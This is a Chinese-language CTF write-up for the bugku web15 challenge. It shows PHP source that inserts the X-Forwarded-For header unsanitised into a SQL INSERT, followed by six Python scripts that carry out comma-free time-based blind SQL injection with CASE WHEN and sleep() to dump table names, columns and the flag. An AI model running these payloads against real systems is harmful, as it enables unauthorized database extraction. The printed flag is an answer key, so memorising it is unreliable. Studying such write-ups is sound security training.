原创
bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
-
flag格式:flag{xxxxxxxxxxxx}
-
不如写个Python吧
-
-
error_reporting(
0);
-
-
function getIp(){
-
$ip =
'';
-
if(
isset($_SERVER[
'HTTP_X_FORWARDED_FOR'])){
-
$ip = $_SERVER[
'HTTP_X_FORWARDED_FOR'];
-
}
else{
-
$ip = $_SERVER[
'REMOTE_ADDR'];
-
}
-
$ip_arr = explode(
',', $ip);
-
return $ip_arr[
0];
-
-
}
-
-
$host=
"localhost";
-
$user=
"";
-
$pass=
"";
-
$db=
"";
-
-
$connect = mysql_connect($host, $user, $pass)
or
die(
"Unable to connect");
-
-
mysql_select_db($db)
or
die(
"Unable to select database");
-
-
$ip = getIp();
-
echo
'your ip is :'.$ip;
-
$sql=
"insert into client_ip (ip) values ('$ip')";
-
mysql_query($sql);
很明显,ip由xff头或者Remote-addr得来,然后在insert into语句中对这个ip进行查询,我们可以把注入语句加到这个ip中来进行注入。
尝试了报错盲注,没有回显,也试了bool盲注,发现length(database())的值不管设成多少页面都不报错。
最后就剩延时盲注了,简单判断下库长,发现有延时反应,且可判断出库长为5。
上面代码中的ip是被过滤掉逗号的,所以我们延时盲注时不能用if语句。
只能用case when then代替,其余的部分和if延时盲注一样,下面给出脚本:(mysql不分大小写)
1、爆联合表长(有了库长,且库名可用database()代替,不再爆库名了,想爆可以自己去爆:web15)
-
import requests
-
-
dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
-
url = 'http://123.206.87.240:8002/web15/'
-
xff = "'+(
select
case
when(
substr((
select
group_concat(table_name separator
'@')
from information_schema.tables
where table_schema=
database())
from {
0}
for
1)=
'')
then
sleep(
4)
else
1
end) +
'1"
-
for i in range(1, 30):
-
try:
-
headers = {'x-forwarded-
for
':xff.format(i)}
-
r = requests.get(url, headers=headers, timeout = 3)
-
except requests.exceptions.ReadTimeout:
-
print(i)
-
break
结果为15,所以联合表长为14
2、爆联合表名
-
import requests
-
-
dic = '0123456789abcdefghijklmnopqrstuvwxyz_@'
-
url = 'http://123.206.87.240:8002/web15/'
-
xff = "'+(
select
case
when(
substr((
select
group_concat(table_name)
from information_schema.tables
where table_schema=
database())
from {
0}
for
1)=
'{1}')
then
sleep(
4)
else
1
end) +
'1"
-
table = ''
-
for i in range(1, 15):
-
for j in dic:
-
try:
-
headers = {'x-forwarded-
for
':xff.format(i, j)}
-
r = requests.get(url, headers=headers, timeout = 3)
-
except requests.exceptions.ReadTimeout:
-
table += j
-
print(table)
-
print(table)
结果为:client_ip@flag
3、爆联合列长
-
import requests
-
-
dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
-
url = 'http://123.206.87.240:8002/web15/'
-
xff = "'+(
select
case
when(
substr((
select
group_concat(column_name separator
'@')
from information_schema.columns
where table_name=
'flag')
from {
0}
for
1)=
'')
then
sleep(
4)
else
1
end) +
'1"
-
for i in range(1, 30):
-
try:
-
headers = {'x-forwarded-
for
':xff.format(i)}
-
r = requests.get(url, headers=headers, timeout = 3)
-
except requests.exceptions.ReadTimeout:
-
print(i)
-
break
得到列长为4
4、爆联合列名
-
import requests
-
-
dic = '0123456789abcdefghijklmnopqrstuvwxyz_@'
-
url = 'http://123.206.87.240:8002/web15/'
-
xff = "'+(
select
case
when(
substr((
select
group_concat(column_name separator
'@')
from information_schema.columns
where table_name=
'flag')
from {
0}
for
1)=
'{1}')
then
sleep(
4)
else
1
end) +
'1"
-
column = ''
-
for i in range(1, 5):
-
for j in dic:
-
try:
-
headers = {'x-forwarded-
for
':xff.format(i, j)}
-
r = requests.get(url, headers=headers, timeout = 3)
-
except requests.exceptions.ReadTimeout:
-
column += j
-
print(column)
-
print(column)
只有一列,列名为flag。
5、爆内容长度
-
import requests
-
-
dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
-
url = 'http://123.206.87.240:8002/web15/'
-
xff = "'+(
select
case
when(
substr((
select flag
from flag)
from {
0}
for
1)=
'')
then
sleep(
4)
else
1
end) +
'1"
-
for i in range(1, 50):
-
try:
-
headers = {'x-forwarded-
for
':xff.format(i)}
-
r = requests.get(url, headers=headers, timeout = 3)
-
print(i)
-
except requests.exceptions.ReadTimeout:
-
print(i)
-
break
得内容长度为32
6、爆内容(即flag)
-
import requests
-
-
dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
-
url = 'http:
//123.206.87.240:8002/web15/'
-
xff =
"'+(select case when(substr((select flag from flag) from {0} for 1)='{1}')then sleep(4) else 1 end) + '1"
-
dump = ''
-
for i
in range(
1,
33):
-
for j
in dic:
-
try:
-
headers = {'x-forwarded-
for':xff.format(i, j)}
-
r = requests.
get(url, headers=headers, timeout =
3)
-
except requests.exceptions.
ReadTimeout:
-
dump += j
-
print(
dump)
-
print(
dump)
得出:cdbf14c9551d5be5612f7bb5d2867853
文章最后发布于: 2019-03-31 19:05:28
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
